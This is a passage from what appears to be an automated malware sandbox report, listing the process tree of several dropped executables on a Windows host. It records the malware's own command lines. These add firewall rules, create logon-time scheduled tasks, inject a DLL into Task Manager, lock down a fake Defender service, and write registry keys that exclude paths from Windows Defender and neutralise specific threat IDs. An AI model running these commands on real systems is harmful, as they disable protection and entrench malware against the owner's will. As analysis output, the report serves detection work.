      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3424
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:1492
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5116
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:4180
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:4352
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4848
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:1080
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5016
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:768
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:4760
- - C:\Users\Admin\Pictures\bhJ3c6tgDurzcpzQl6wOvaig.exe
    "C:\Users\Admin\Pictures\bhJ3c6tgDurzcpzQl6wOvaig.exe"
    3⤵
    - Modifies firewall policy service
    - Windows security bypass
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Windows security modification
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1524
- - C:\Users\Admin\Pictures\SzKigIDAe1j2pUJtKhKBZnNC.exe
    "C:\Users\Admin\Pictures\SzKigIDAe1j2pUJtKhKBZnNC.exe"
    3⤵
    - Executes dropped EXE
    PID:556
  - - C:\Users\Admin\AppData\Local\Temp\7zS5B0C.tmp\Install.exe
      .\Install.exe /RvdidblCuX "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:3544
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:3076
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4444
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 08:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\FIRIDcf.exe\" em /Vasite_idAwJ 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:2840
- - C:\Users\Admin\Pictures\CTcEGVlSRrBrhp7BbbxeNOFp.exe
    "C:\Users\Admin\Pictures\CTcEGVlSRrBrhp7BbbxeNOFp.exe"
    3⤵
    - Executes dropped EXE
    PID:4444
  - - C:\Users\Admin\AppData\Local\Temp\7zSB234.tmp\Install.exe
      .\Install.exe /RvdidblCuX "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:1700
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2440
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:4940
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 08:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\tEGeVxK.exe\" em /tfsite_idCfk 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4760
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
  2⤵
  PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 476 -ip 476
1⤵
PID:604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4180 -ip 4180
1⤵
PID:580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:424

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2088

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\tEGeVxK.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\tEGeVxK.exe em /tfsite_idCfk 385118 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4404
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:484
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1532
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4004
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3152
- - C:\Windows\SysWOW64\reg.exe
